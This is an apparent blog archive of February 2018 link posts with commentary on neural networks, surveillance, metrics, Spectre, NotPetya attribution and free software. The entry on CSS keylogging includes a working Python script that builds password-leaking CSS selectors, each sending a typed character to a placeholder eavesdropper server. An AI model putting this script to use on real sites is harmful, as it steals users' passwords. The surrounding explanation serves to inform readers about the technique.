Archive for February 2018

Neural Networks as Function Simulators

2018-02-28⊺12:02:27-06:00

Some of the limitations of black-box deciders become more obvious and intuitive when one recognizes the machine-learning algorithms behind them as software tools for approximating functions, calibrated statistically with the help of large data sets.

“The Delusions of Neural Networks”
Giacomo Tesio, Medium, January 18, 2018
https://medium.com/@giacomo_59737/the-delusions-of-neural-networks-f7085d47edb6

The key points:

(A) Neural networks simulate functions and are calibrated statistically, with the assistance of large data sets comprising known argument-value pairs.

(B) Like other simulations, neural networks sometimes yield erroneous or divergent results. The functions they actually compute are usually not mathematically equal to the functions they simulate.

(C) The reason for this is that the calibration process uses only a finite number of argument-value pairs, whereas the function that the neural network is designed to simulate computes values for infinitely many arguments, or at least for many, many more arguments than are used in the calibration. (Otherwise, the simulation would be useless.) The data used in the calibration are compatible with many, many more functions than the one that the neural network is designed to simulate. The probability that calibrating the neural network results in its computing a function that is mathematically equal to the one it is designed to simulate is negligible — for practical purposes, it is zero. (A toy example illustrating points (B) and (C) appears after this list.)

(D) The problem of determining how accurately a neural network simulates the function it is designed to simulate is undecidable. There is no general algorithm to answer questions of this form. As a result, neural networks are usually validated not by proving their correctness but by empirical measurement: We apply them to arguments not used in the calibration process and compare the values they compute to the values that the functions they are designed to simulate associate with the same test arguments. When they match in a large enough percentage of cases, we pronounce the simulation a success.

(E) However, these test arguments are not generated at random, but are drawn from the same “natural” sources as the data used in the calibration of the network. The success of the simulation depends on this bias: Unless the test arguments are sufficiently similar to the data used in the calibration, the probability that the computed values will match is again negligible. This would essentially never happen if the test arguments were randomly selected.

(F) Consequently, the process of validating a neural network does not prove that it is unbiased. On the contrary: in order to be pronounced valid, a neural network must simulate the biases of the data set used in the calibration.

(G) In principle, it would be possible for independent judges to confirm that the data set is free from forms of bias that constitute discrimination against some protected class of persons and to provide strong empirical evidence that the function actually computed by the neural network does not actually introduce such a bias. In practice, this confirmation process would be prohibitively expensive and time-consuming.

(H) Neural networks can be used, and often are used, to simulate unknown functions. In those cases, there would be no way for a panel of independent judges even to begin the process of confirming freedom from discriminatory bias, because no one even knows whether the function that the neural network is designed to simulate exemplifies such a bias.
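
As a concrete illustration of points (B) and (C), here is a minimal sketch, assuming the numpy and scikit-learn libraries (my choice for illustration; the article does not discuss any particular tools): a small network is calibrated on a finite sample of argument-value pairs drawn from the sine function, approximates it tolerably well inside the sampled range, and computes something quite different outside it.

    # Calibrate a small neural network on finitely many argument-value pairs
    # drawn from sin(x), then compare the function it actually computes with
    # the function it is designed to simulate.
    import numpy as np
    from sklearn.neural_network import MLPRegressor

    rng = np.random.default_rng(0)

    # The calibration data: two hundred known argument-value pairs from [0, 2*pi].
    x_train = rng.uniform(0.0, 2.0 * np.pi, size=(200, 1))
    y_train = np.sin(x_train).ravel()

    net = MLPRegressor(hidden_layer_sizes=(32, 32), max_iter=5000, random_state=0)
    net.fit(x_train, y_train)

    # Inside the calibrated range the simulation is close; far outside it, the
    # function the network actually computes diverges from the sine function.
    for x in (1.0, 3.0, 10.0, 25.0):
        print(f"x = {x:5.1f}   sin(x) = {np.sin(x):+.3f}   "
              f"network = {net.predict([[x]])[0]:+.3f}")

Even inside the calibration range the two functions agree only approximately; as point (B) says, they are not mathematically equal.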

#black-box-deciders #neural-networks #simulation

Practical Guidance for Novice Fact-Checkers

2018-02-28⊺10:02:51-06:00

A guide to assessing the reliability of sources of information on the Internet, containing many useful strategies and warnings.

“Web Literacy for Student Fact-Checkers”
Mike Caulfield, January 8, 2017
https://webliteracy.pressbooks.com/

#fact-checking #trust

Paradigms of Artificial Intelligence Programming Is Now Free Software

2018-02-27⊺11:20:27-06:00

Peter Norvig has made his brilliant textbook on classical methods of artificial intelligence available at GitHub under the MIT license, along with all of the source code.

“Lisp Code for the Textbook ‘Paradigms of Artificial Intelligence Programming’”
Peter Norvig, GitHub, February 27, 2018
https://github.com/norvig/paip-lisp

Read and enjoy!

#artificial-intelligence #LISP #free-books

Secrecy Makes Public Discussion of the Nunes and Schiff Memos Pointless

2018-02-27⊺10:53:19-06:00

“The Problems with FISA, Secrecy, and Automatically Classified Information”
David Ruiz, Deeplinks, Electronic Frontier Foundation, February 26, 2018
https://www.eff.org/deeplinks/2018/02/problems-fisa-secrecy-and-automatically-classified-information

The gist: The key question raised in the Nunes and Schiff memos is whether the evidence supporting the Federal Bureau of Investigation's applications for a surveillance order against a prominent Republican, formerly an advisor to the President, consisted entirely of biased information funded by political opponents of the President. But neither side knows the answer to that question, because it's classified, and no member of the House Permanent Select Committee on Intelligence could provide the answer in public even if they did know it, for the same reason. The general public will never have enough evidence to answer this question or even to form a reliable opinion about it. The House Permanent Select Committee on Intelligence will never even have enough information to carry out its duty to oversee the implementation of the Foreign Intelligence Surveillance Act.

The optimists at the Electronic Frontier Foundation believe that it will someday be possible to repeal the Foreign Intelligence Surveillance Act and to restore a measure of transparency to the operations of the government's counterterrorism agencies. My own view is that those agencies are above the law and permanently out of its reach.

#Foreign-Intelligence-Surveillance-Act #oversight #Federal-Bureau-of-Investigation

Holding a Pencil Becomes a Learning Outcome

2018-02-25⊺21:03:18-06:00

*Sigh.*

“Children Struggle to Hold Pencils Due to Too Much Tech, Doctors Say”
Amelia Hill, The Guardian, February 25, 2018
https://www.theguardian.com/society/2018/feb/25/children-struggle-to-hold-pencils-due-to-too-much-tech-doctors-say

No, it's not “too much tech” — it's too little experience with crayons, building blocks, pull toys, modeling clay, and such like.

“Children are not coming into school with the hand strength and dexterity they had 10 years ago,” said Sally Payne, the head paediatric occupational therapist at the Heart of England foundation NHS Trust. “Children coming into school are being given a pencil but are increasingly not able to hold it because they don't have the fundamental movement skills.”

“To be able to grip a pencil and move it, you need strong control of the fine muscles in your fingers. Children need lots of opportunity to develop those skills.”

#child-development #technology-in-education #schools

Learning Objectives Disparaged

2018-02-24⊺17:11:45-06:00

“The Misguided Drive to Measure ‘Learning Outcomes’”
Molly Worthen, The New York Times Sunday Review, February 23, 2018
https://www.nytimes.com/2018/02/23/opinion/sunday/colleges-measure-learning-outcomes.html

The gist: Formulating elaborate hierarchies of quantifiable learning objectives and continually assessing students' notional success in achieving them is a foolish and cruel waste of everyone's time.

The ballooning assessment industry — including the tech companies and consulting firms that profit from assessment — is a symptom of higher education's crisis, not a solution to it. It preys especially on less prestigious schools and contributes to the system's deepening divide into a narrow tier of elite institutions primarily serving the rich and a vast landscape of glorified trade schools for everyone else. …

The obsession with testing that dominates primary education invaded universities, bringing with it a large support staff. Here is the first irony of learning assessment: Faced with outrage over the high cost of higher education, universities responded by encouraging expensive administrative bloat. …

If we describe college courses as mainly delivery mechanisms for skills to please a future employer, if we imply that history, literature and linguistics are more or less interchangeable “content” that convey the same mental tools, we oversimplify the intellectual complexity that makes a university education worthwhile in the first place. We end up using the language of the capitalist marketplace and speak to our students as customers rather than fellow thinkers. They deserve better.

#learning-objectives #assessment #metrics

Hyper-Analytic Management

2018-02-24⊺16:40:22-06:00

I must have missed this article when it first appeared.

“They're Watching You at Work”
Don Peck, The Atlantic, December 2013
https://www.theatlantic.com/magazine/archive/2013/12/theyre-watching-you-at-work/354681/

One of the main topics is the now-common use of surveillance technologies to micromanage employees and micromonitor their activities and every aspect of their performance:

Torrents of data are routinely collected by American companies and now sit on corporate servers, or in the cloud, awaiting analysis. Bloomberg reportedly logs every keystroke of every employee, along with their comings and goings in the office. The Las Vegas casino Harrah's tracks the smiles of the card dealers and waitstaff on the floor (its analytics team has quantified the impact of smiling on customer satisfaction). E-mail, of course, presents an especially rich vein to be mined for insights about our productivity, our treatment of co-workers, our willingness to collaborate or lend a hand, our patterns of written language, and what those patterns reveal about our intelligence, social skills, and behavior. As technologies that analyze language become better and cheaper, companies will be able to run programs that automatically trawl through the e-mail traffic of their workforce, looking for phrases or communication patterns that can be statistically associated with various measures of success or failure in particular roles.

An even more thought-provoking passage deals with data mining as a method of distinguishing candidates for software-development positions:

This past summer, I sat in on a sales presentation by Gild, a company that uses people analytics to help other companies find software engineers. I didn't have to travel far: Atlantic Media, the parent company of The Atlantic, was considering using Gild to find coders. …

The company's algorithms begin by scouring the Web for any and all open-source code, and for the coders who wrote it. They evaluate the code for its simplicity, elegance, documentation, and several other factors, including the frequency with which it's been adopted by other programmers. For code that was written for paid projects, they look at completion times and other measures of productivity. Then they look at questions and answers on social forums such as Stack Overflow, a popular destination for programmers seeking advice on challenging projects. They consider how popular a given coder's advice is, and how widely that advice ranges.

The algorithms go farther still. They assess the way coders use language on social networks from LinkedIn to Twitter; the company has determined that certain phrases and words used in association with each other can distinguish expert programmers from less skilled ones. Gild knows these phrases and words are associated with good coding because it can correlate them with its evaluation of open-source code, and with the language and online behavior of programmers in good positions at prestigious companies.

Here's the part that's most interesting: having made those correlations, Gild can then score programmers who haven't written open-source code at all, by analyzing the host of clues embedded in their online histories. They're not all obvious, or easy to explain. Vivienne Ming, Gild's chief scientist, told me that one solid predictor of strong coding is an affinity for a particular Japanese manga site.

Why would good coders (but not bad ones) be drawn to a particular manga site? By some mysterious alchemy, does reading a certain comic-book series improve one's programming skills? “Obviously, it's not a causal relationship,” Ming told me. But Gild does have 6 million programmers in its database, she said, and the correlation, even if inexplicable, is quite clear. …

Gild's CEO, Sheeroy Desai, told me that he believes his company's approach can be applied to any occupation characterized by large, active online communities, where people post and cite individual work, ask and answer professional questions, and get feedback on projects.

It cheers me somewhat to report that Gild appears to have gone out of business in 2016.

#data-mining #micromanagement #workplace-surveillance

Self-Affirmation Talk Titles Generated by a Neural Network

2018-02-23⊺16:14:52-06:00

“I Will Improve My Batography Skills.”

“New Ways to Market Your Self-Affirmation Talk, Thanks to a Neural Network”
Janelle Shane, Postcards from the Frontiers of Science, February 23, 2018
http://aiweirdness.com/post/171200336312/new-ways-to-market-your-self-affirmation-talk

#neural-networks #natural-language-processing #funny

Social Credit Scoring in the Surveillance State

2018-02-22⊺22:55:24-06:00

A fuller description of the nature and use of social-credit scores in China:

“China's Dystopian Tech Could Be Contagious”
Adam Greenfield, The Atlantic, February 14, 2018
https://www.theatlantic.com/technology/archive/2018/02/chinas-dangerous-dream-of-urban-control/553097/

Every Chinese citizen receives a literal, numeric index of their trustworthiness and virtue, and this index unlocks, well, everything. … This one number will determine the opportunities citizens are offered, the freedoms they enjoy, and the privileges they are granted.

This end-to-end grid of social control is still in its prototype stages, but three things are already becoming clear: First, where it has actually been deployed, it has teeth. Second, it has profound implications for the texture of urban life. And finally, there's nothing so distinctly Chinese about it that it couldn't be rolled out anywhere else the right conditions obtain. The advent of social credit portends changes both dramatic and consequential for life in cities everywhere — including the one you might call home.

My guess is that something like this is coming soon to the United States. The infrastructure is already mostly in place. Extrapolating from the current state of affairs, I'd speculate that the first use of social-credit scores in the U.S. will be to manage access to posting on Facebook and Twitter. It would be one of the easier ways to exclude Russian bots and even (after a few months of data collection) Russian identity thieves. After that, new categories of doubleplusungood propaganda will really begin to proliferate, and soon social media will be safely under the control of the established elites, plus a few elderly cat fanciers and cupcake decorators who are innocuous enough to retain the privilege of posting.

#social-credit-scoring #surveillance #factoids

Misusing CSS to Capture Passwords As Users Enter Them

2018-02-21⊺14:21:03-06:00

Cascading Style Sheets, considered as a domain-specific language, is powerful enough to enable malicious Web designers to detect and record plaintext entries in text fields of interactive Web pages as users type them in. The key idea is to use selectors like input[type="password"][value$="a"] and specify that the background-image should be loaded from some URL where the eavesdropper has access to the log. The log entry will appear whenever the last character that the user typed into a password field is a lower-case a. By providing ninety-five such selectors, each loading a different background image from the eavesdropper's server, the eavesdropper can check the log to see which images were requested and in what order, and infer the entered password from that list.

“CSS-Keylogging”
“maxchehab”, GitHub, February 20, 2018
https://github.com/maxchehab/CSS-Keylogging
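
As a concrete illustration of the technique described above, here is a minimal sketch that generates the ninety-five malicious rules, one per printable ASCII character. The logging address is a hypothetical placeholder for a server under the eavesdropper's control.

    # Generate one CSS rule per printable ASCII character. Each rule requests a
    # distinct "background image" from the eavesdropper's server whenever that
    # character is the last one in the password field's value attribute.
    import string
    from urllib.parse import quote

    LOG_SERVER = "https://eavesdropper.example/log"   # hypothetical placeholder

    printable = string.digits + string.ascii_letters + string.punctuation + " "   # 95 characters

    rules = []
    for ch in printable:
        escaped = ch.replace("\\", "\\\\").replace('"', '\\"')   # escape for the CSS string
        rules.append(
            f'input[type="password"][value$="{escaped}"] '
            f'{{ background-image: url("{LOG_SERVER}?key={quote(ch)}"); }}'
        )

    print("\n".join(rules))

Injecting the generated rules into a page's style sheet and then reading the server's access log reveals which images were requested and in what order, as described above.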

#Cascading-Style-Sheets #keylogging #domain-specific-languages

The New York Times Chooses to Remain Ignorant about Hacker Tech

2018-02-19⊺07:29:13-06:00

Last Tuesday, the New York Times hired Quinn Norton and then, a few hours later, got a case of the fantods and fired her. Management had belatedly discovered that some of her sources hold extreme right-wing political opinions and that, when interacting with them, she uses language that is taboo in the circles where the Grey Lady prefers to operate.

“The NY Times Fires Tech Writer Quinn Norton, And It's Complicated”
Adam Rogers, Wired, February 14, 2018
https://www.wired.com/story/the-ny-times-fires-tech-writer-quinn-norton-and-its-complicated/

#Quinn-Norton #mainstream-media #hacker-tech

The Opacity of Black-Box Metrics

2018-02-16⊺16:13:24-06:00

This week, I've been reading The Tyranny of Metrics, a new book by the historian Jerry Z. Muller of the Catholic University of America. One of the themes of the book is that metrics lose their reliability when they are transparently tied to rewards. For example, a hospital might decide to give bonuses to surgeons whose operations have a higher rate of success, as measured by the percentage of those operations after which the patient survives for at least thirty days. The idea is to improve the overall quality and performance of surgical operations in the hospital by motivating surgeons to do better work. In practice, however, what often happens is that surgeons refuse to take on high-risk patients, or they arrange for their patients' post-op caretakers to use heroic measures to keep them alive for at least thirty-one days. The metrics award higher scores to the surgeons who successfully game the system, and they receive their bonuses, but the overall quality and performance of surgical operations do not, in fact, increase as a result. The metric has lost any reliability it once had as a measure of overall quality and performance.

It occurs to me that, as black-box deciders take over the job of assessing the performance of workers and deciding which of them should receive bonuses, the opacity of the decision systems may block this loss of reliability, by making it much more difficult, perhaps impossible, for the workers to game the system. If there is no explanation for the black-box decider's assessments, there is no way for the workers to infer that any particular tactic will change those assessments in their favor.

Of course, this also means that there is no way for managers to devise rational policies for improving the work of their staff. Because the black-box deciders are opaque and their judgements inexplicable and unaccountable, there is no way to distinguish policy changes that will have positive results (as assessed by the black-box decider) from those that will have negative results.

#black-box-deciders #metrics #opacity

Weak Arguments for Attribution of Network Attacks

2018-02-15⊺16:59:32-06:00

You would think that experienced diplomats would demand extremely reliable evidence for attributing a network attack to agents of a foreign government. But accurate attribution is so difficult, the perceived need to find someone to blame is so profound, and the notional political advantages of blaming some currently unpopular rival state are so compelling that governments are willing to proceed with accusations on incredibly weak and ambiguous evidence.

A case in point: The government of the United Kingdom has joined the United States in blaming the widespread and consequential propagation of the NotPetya ransomware on the agents of the Russian government. Here is the basis for their confident accusation:

1. More computers were affected in the Ukraine than in any other country. The Russian government hates the Ukrainian government.

2. One vector for the spread of the malware was an accounting software package used in the Ukraine. The Russian government hates Ukrainian software developers.

3. The attack “fits a pattern” that also describes other attacks that have been previously attributed to agents of the Russian government (on even flimsier evidence).

4. NotPetya was a variant of an earlier ransomware package called Petya, but it appears to have been reimplemented from scratch instead of being adapted from the Petya codebase. This demonstrates the level of technical sophistication characteristic of a nation-state. Russia is a technically sophisticated nation-state.

5. The ransomware feature of NotPetya didn't work, and provided no way for the victims to pay the ransom to the attackers. Instead, NotPetya simply waited for the payment window to run out and then wiped the targeted system's drives. Similarly, the Russian military has often used criminal operations as cover for special ops and not infrequently employs deception as a military tactic.

6. NotPetya exploited two vulnerabilities originally identified by the National Security Agency and made public by a group (nationality unknown) calling itself the Shadow Brokers. Some people have speculated that the hackers who stole the NSA's tools for exploiting these vulnerabilities were agents of the Russian government.

7. Don't forget: The Russian government hates the Ukrainian government.

*Sigh.*

“What the UK Knows: Five Things That Link NotPetya to Russia”
Paul Roberts, The Security Ledger, February 15, 2018
https://securityledger.com/2018/02/what-the-uk-knows-five-things-that-link-notpetya-to-russia/

(In case you're trying to link my seven-item list to the “five things” mentioned in the article title or to the five slides in the slideshow at the end of the article: the first slide corresponds to items 1, 2, and 3 on my list, the second to my item 4, the third to my item 5, the fourth to my item 6, and the fifth to my item 7.)

#NotPetya #attribution #Russia

Microsoft C Compiler Fails to Obstruct Spectre

2018-02-15⊺14:48:06-06:00

Last month, Microsoft announced an improvement in their compiler for Visual C and C++. It now blocks some variants of the Spectre attack by inserting LFENCE instructions to block speculative execution when it detects a pattern in the code it is compiling that is characteristic of Spectre attacks. In effect, the compiler is using the antivirus technique of looking for a “signature” of the attack and applying countermeasures when it finds one.

This approach has two main limitations. Firstly, blacklisting known attacks instead of whitelisting code patterns that are known to be safe doesn't address the vulnerability in full generality, since an unanticipated variant of the attack that has a slightly different signature can still succeed. Secondly, it complicates debugging and maintenance, since it is much more difficult to identify, by manual inspection, cases in which the countermeasures should have been applied but weren't than it is to find (operationally) cases in which the countermeasures were applied even though they weren't needed.

Microsoft chose the signature-blacklisting approach because it entails less of a performance penalty: Programs compiled with the new compiler run almost as fast as the vulnerable versions produced by the old compiler. If it had been designed to insert LFENCE instructions whenever it could not prove that the code being compiled was safe without them, the performance hit would have been much, much larger.

“Spectre Mitigations in Microsoft's C/C++ Compiler”
Paul Kocher, February 13, 2018
https://www.paulkocher.com/doc/MicrosoftCompilerSpectreMitigation.html

The author of this article created a rough benchmark to determine how much protection the signature-blacklisting approach actually provides. He took the proof-of-concept C program provided by the team that devised the Spectre attack in the first place and developed fourteen variations of the key function. Most of the variations were easy and straightforward, not to say trivial.

Microsoft's new C compiler correctly inserted LFENCE instructions in the original proof-of-concept code and in one of the variants (in which the key instruction was replaced with a call to a function that executed the instruction and the function was then inlined). The new C compiler generated unsafe code for the other thirteen variants.

#microsoft #spectre #mitigation

Against Dynamic E-Mail

2018-02-15⊺10:32:06-06:00

The usefulness of an individual's saved e-mail archive depends on the static and immutable nature of the content. We need our archives to serve as reliable extensions of our memories and as accurate records of the decisions, thoughts, and personal expressions of our correspondents. To the extent that modern e-mail protocols allow saved posts to incorporate content downloaded from the Internet at the time the message is (re)displayed or to execute programs that behave differently over time, they are undermining these critically important archival functions and wasting the time and effort that we put into curating our e-mail archives.

If Google's “Accelerated Mobile Pages in Gmail” project is successful, we're soon going to be receiving much more unarchivable e-mail. Thanks, fools!

“Email Is Your Electronic Memory”
Bron Gondwana, FastMail Blog, February 14, 2018
https://blog.fastmail.com/2018/02/14/email-is-your-electronic-memory/

Alas, even without the distortions introduced by dynamic content, most e-mail messages go through so many filters, transducers, ad inserters, ad removers, link rewriters, and formatters that it is rare for the content provided by the sender to reach the receiver intact anyway.

#e-mail #keeping-stuff #Accelerated-Mobile-Pages

Enforcing the GNU General Public License

2018-02-14⊺09:56:07-06:00

A lawyer for the Software Freedom Conservancy explains recent developments relating to the application of the GNU General Public License. The gist: the GPL is consistently upheld in court, but willful violators have frequently succeeded in unreasonably delaying the day of reckoning, and there are more willful violators than ever.

“A GPL-Enforcement Update”
Jonathan Corbet, LWN.net, February 13, 2018
https://lwn.net/SubscriberLink/747124/a6def304e3b87e31

One other ongoing problem is proprietary kernel modules. The SFC has even seen companies patching EXPORT_SYMBOL_GPL to get the kernel to accept their non-GPL modules, a development Sandler described as “fascinating, shocking, and deeply upsetting.”

#GNU-General-Public-License #software-licenses #Software-Freedom-Conservancy

Avoiding Paywalls

2018-02-13⊺18:12:28-06:00

Many mainstream media companies don't try to enforce paywalls against visitors who are using Private Browsing.

“How to Deprive Mainstream Media of Revenue and Get Around Their Paywalls”
Caitlin Johnstone, Medium, February 12, 2018
https://medium.com/@caityjohnstone/how-to-deprive-mainstream-media-of-revenue-and-get-around-their-paywalls-fb515deb4fb8

I've been able to build a career on attacking mainstream media narratives using only the techniques described above.

#rules-for-radicals #media-deconstruction #paywalls

Self-Driving Cars As Networked Weapons

2018-02-12⊺13:17:26-06:00

A threat analysis of self-driving cars, considered as potential weapons of hackers and terrorists.

“Self-Crashing Cars”
Zach Aysan, January 17, 2018
https://www.zachaysan.com/writing/2018-01-17-self-crashing-cars

I have a number of ideas on how to approach a solution to this problem, but the most important one is this: Engineers and software professionals need to recognize that our politicians aren't able to intelligently regulate autonomous devices and our corporations lack the incentives to completely protect us. A well-funded, open source effort with clear recommendations will be the most effective way to securing the future.

At the end of the essay, Aysan provides about forty specific recommendations about how to design secure computer networks for cars and what constraints should be imposed on them. Here's an example:

Safety modules should have no ports and no network connection to debugging devices or update servers. The code that commands them should not be alterable at the hardware layer. Their job is simple: Relay commands and initiate emergency shutdowns. They should be designed to be regularly recyclable, and should be physically replaced in secure, government run facilities when requiring an upgrade.

#security #autonomous-vehicles #network-warfare

Diminishing Returns from Deep Learning

2018-02-12⊺11:00:39-06:00

An overview of the recent achievements, acknowledged limitations, and plausible extensions of multi-level neural networks suggests that this approach to artificial intelligence is nearly played out and must be supplemented by alternative approaches in order to make further progress.

In section 3, the author identifies ten “limits on the scope of deep learning,” including some that I would consider critical and ineradicable (see section 3.5, “Deep Learning Thus Far Is Not Sufficiently Transparent,” and section 3.9, “Deep Learning Thus Far Works Well as an Approximation, But Its Answers Often Cannot Be Fully Trusted”).

“Deep Learning: A Critical Appraisal”
Gary Marcus, arXiv, January 2018
https://arxiv.org/ftp/arxiv/papers/1801/1801.00631.pdf

The transparency issue, as yet unsolved, is a potential liability when using deep learning for problem domains like financial trades or medical diagnosis, in which human users might like to understand how a given system made a given decision. … Such opacity can also lead to serious issues of bias.

None of Marcus's proposals for supplementing machine learning addresses either the transparency problem or the problem posed by adversarial examples.

#machine-learning #black-box-deciders #neural-networks

A Smart Home Snapshot, 2018

2018-02-09⊺14:03:33-06:00

What is it like to live in a smart home with lots of smart appliances and gadgets?

“The House That Spied on Me”
Kashmir Hill and Surya Mattu, Gizmodo, February 9, 2018
https://gizmodo.com/the-house-that-spied-on-me-1822429852

Getting a smart home means that everyone who lives or comes inside it is part of your personal panopticon, something which may not be obvious to them because they don't expect everyday objects to have spying abilities. One of the gadgets — the Eight Sleep Tracker — seemed aware of this, and as a privacy-protective gesture, required the email address of the person I sleep with to request his permission to show me sleep reports from his side of the bed. But it's weird to tell a gadget who you are having sex with as a way to protect privacy, especially when that gadget is monitoring the noise levels in your bedroom. …

I was looking forward to the end of the experiment and getting rid of all the Internet-connected devices I'd accumulated, as well as freeing up the many electrical outlets they'd been hogging. …

But the truth is that my house will remain smart, just like yours may be. Almost every TV on the market now is connected — because otherwise how do you Netflix and chill? — and over 25 million smart speakers were sold last year alone, with Apple soon to release its version, the HomePod, meaning a good percentage of American homes have or will have an internet-connected assistant waiting patiently for someone in the house to say their wake word. …

We may already be past the point of no return: internet functionality is a necessary component for the operation of many devices in our home, and it increasingly gets added on as a feature even when it's not strictly necessary. … Once the data is going over the wires, companies can't seem to resist peeking at it, no matter how sensitive it is.

#Internet-of-Things #smart-home #privacy

Law Enforcement Dissolves Civil Rights Universally

2018-02-09⊺10:21:57-06:00

It is now common practice for anyone who has a government job and claims to be enforcing the law to use whatever surveillance technology is available to collect data about anyone and everyone. A new bill in Congress would institutionalize this practice (and legitimize it, if it were constitutional, which it is not).

“The CLOUD Act: A Dangerous Expansion of Police Snooping on Cross-Border Data”
Camille Fischer, Deeplinks, Electronic Frontier Foundation, February 8, 2018
https://www.eff.org/deeplinks/2018/02/cloud-act-dangerous-expansion-police-snooping-cross-border-data

The bill creates an explicit provision for U.S. law enforcement … to access “the contents of a wire or electronic communication and any record or any other information” about a person regardless of where they live or where that information is located on the globe. In other words, U.S. police could compel a service provider — like Google, Facebook, or Snapchat — to hand over a user's content and metadata, even if it is stored in a foreign country, without following that foreign country's privacy laws.

Second, the bill would allow the President to enter into “executive agreements” with foreign governments that would allow each government to acquire user's data stored in the other country, without following each other's privacy laws.

#Clarifying-Overseas-Use-of-Data-Act #surveillance #law-enforcement

Universities Submit to Facebook's Surveillance Capitalism

2018-02-08⊺14:30:12-06:00

Silence, peasants! Resistance is futile!

“Please: Let's Be Real about Facebook”
Michael Stoner, Inside Higher Ed, February 8, 2018
https://www.insidehighered.com/blogs/call-action-marketing-and-communications-higher-education/please-let’s-be-real-about-facebook

Let me repeat: it gets results. For that reason — and because so many people use Facebook — it's become integral to higher ed marketing, communications, and advancement strategies. …

Let's agree that the only recourse we have is to get used to having our attention sold or stop using these services. But let's not be shocked that Facebook is doing exactly what it's designed to do.

#surveillance-capitalism #Facebook #marketing-higher-education

The iOS Bootloader Leaked

2018-02-08⊺14:12:13-06:00

The source code for the part of Apple's iOS operating system that starts at power-up and verifies and loads the rest of the kernel leaked some time last year and was even available on GitHub for a time. Apple asserted its ownership and got GitHub to remove the code, thus ensuring that black hats will give it close attention and circulate it widely, while white hats who don't already have a copy will not be able to copy it legally.

“Key iPhone Source Code Gets Posted Online in ‘Biggest Leak in History’”
Lorenzo Franceschi-Bicchierai, Motherboard, February 8, 2018
https://motherboard.vice.com/en_us/article/a34g9j/iphone-source-code-iboot-ios-leak

This means that tethered jailbreaks, which require the phone to be connected to a computer when booting, could soon be back. These jailbreaks used to be relatively easy to pull off and were common, but are now extremely hard to come by on up-to-date iOS devices, which have advanced security mechanisms. …

It's these security improvements that have effectively killed the once popular jailbreak community. Nowadays, finding bugs and vulnerabilities in iOS is something that requires a significant amount of time and resources, making the resulting exploits incredibly valuable. That's why the jailbreaking community gets excited for any leak of source code or any exploit that gets released publicly.

#iOS #jailbreak #source-code-leaks

The Surveillance State Always Wants More Surveillance

2018-02-08⊺13:45:15-06:00

The Electronic Frontier Foundation sued the government to obtain the opinions of the Foreign Intelligence Surveillance Court on the requests for (unconstitutional) general warrants against American citizens under section 702 of the Foreign Intelligence Surveillance Act, which notionally authorizes the court to issue specific warrants against non-citizens.

Last week, the FISC released about a third of the opinions that the EFF requested, in heavily redacted form. They show that government agencies, seeking the court's approval for warrantless mass surveillance, also tried repeatedly to sneak in language that would have established even wider collection parameters and even longer data-retention policies. Predictably, the insensate demands for ever more intensive surveillance eventually exceed any prescribed bounds, however weak.

“Newly Released Surveillance Orders Show That Even with Individualized Court Oversight, Spying Powers are Misused”
Aaron Mackey and Andrew Crocker, Deeplinks, Electronic Frontier Foundation, February 7, 2018
https://www.eff.org/deeplinks/2018/02/newly-released-surveillance-orders-show-even-individualized-court-oversight-spying

Over a period between 15 months and three years, the NSA obtained [without any court authorization] a number of communications of U.S. persons. The precise number of communications is redacted.

Rather than notifying the court that it had destroyed the communications it obtained without authorization, the NSA made an absurd argument in a bid to retain the communications: because the surveillance was unauthorized, the agency's internal procedures that require officials to delete non-relevant communications should not apply. Essentially, because the surveillance was unlawful, the law shouldn't apply and the NSA should get to keep what it had obtained.

The court rejected the NSA's argument. “One would expect the procedures' restrictions on retaining and disseminating U.S. person information to apply most fully to such communications, not, as the government would have it, to fail to apply at all,” the court wrote.

The court went on to say that “[t]here is no persuasive reason to give the [procedures] the paradoxical and self-defeating interpretation advanced by the government.”

The court then ordered the NSA to destroy the communications it had obtained without FISC authorization. … Rather than immediately complying with the order, the NSA asked the FISC once more to allow it to keep the communications.

Again the court rejected the government's arguments. “No lawful benefit can plausibly result from retaining this information, but further violation of law could ensue,” the court wrote. The court then ordered the NSA to not only delete the data, but to provide reports on the status of its destruction “until such time as the destruction process has been completed.”

That was in May 2011. Whether the NSA ever destroyed the data in question, whether it ever filed any of the required reports, and whether any further violations of law have ensued are all secrets. None of the inside parties has chosen to release the answers. Perhaps further lawsuits will yield some information.

#Foreign-Intelligence-Surveillance-Act #surveillance #National-Security-Agency

John Perry Barlow Remembered

2018-02-07⊺16:31:33-06:00

Into memory:

“John Perry Barlow, Internet Pioneer, 1947—2018”
Cindy Cohn, Deeplinks, Electronic Frontier Foundation, February 7, 2018
https://www.eff.org/deeplinks/2018/02/john-perry-barlow-internet-pioneer-1947-2018

Major parts of the Internet we all know and love exist and thrive because of Barlow's vision and leadership. He always saw the Internet as a fundamental place of freedom, where voices long silenced can find an audience and people can connect with others regardless of physical distance. …

Barlow's lasting legacy is that he devoted his life to making the Internet into “a world that all may enter without privilege or prejudice accorded by race, economic power, military force, or station of birth … a world where anyone, anywhere, may express his or her beliefs, no matter how singular, without fear of being coerced into silence or conformity.”

#John-Perry-Barlow #freedom-of-speech #cyberspace

The Open Source Technology Improvement Fund

2018-02-07⊺14:00:23-06:00

A long-overdue institution, still underfunded.

“For Open-Source Software, the Developers Are All of Us”
Derek Zimmer, Linux Journal, February 7, 2018
https://www.linuxjournal.com/content/open-source-software-developers-are-all-us

You enter information into your Google Chrome browser, on a website running Microsoft Internet Information Server, and the website is verified through Comodo certificate verification. Your data is transmitted through Cisco firewalls and routed by Juniper routers. It passes through an Intel-branded network card on your Dell server and through a SuperMicro motherboard. Then the data is transmitted through the motherboard's serial bus to the SandForce chip that controls your Solid State Disk and is then written to Micron flash memory, in an Oracle SQL database.

You are reliant on every single one of those steps being secure, in a world where the trillion-dollar problem is getting computers to do exactly what they are supposed to do. All of these systems have flaws. Every step has problems and challenges. And if something goes wrong, there is no liability. The lost data damages your company, your livelihood, you. …

So how do we fix this problem? We organize and support open software development. We make sure that important free and open security projects have the resources they need to flourish and succeed. …

We have founded the Open Source Technology Improvement Fund, a 501(c)3 nonprofit whose only job is to fund security research and development for open-source software. We vet projects for viability, find out what they need to improve, and get them the resources to get there. We then verify that their software is safe and secure with independent teams of software auditors, and work with the teams continuously to secure their projects against the latest threats.

#free-software #security-auditing #Open-Source-Technology-Improvement-Fund

A Privilege-Escalation Vulnerability in VMS

2018-02-07⊺09:49:14-06:00

Security researchers are still looking for vulnerabilities in operating systems that have been stable for many, many years and are still in widespread use — in this case, VMS, which runs on VAX, Alpha, and Itanium processors. Occasionally, they find one.

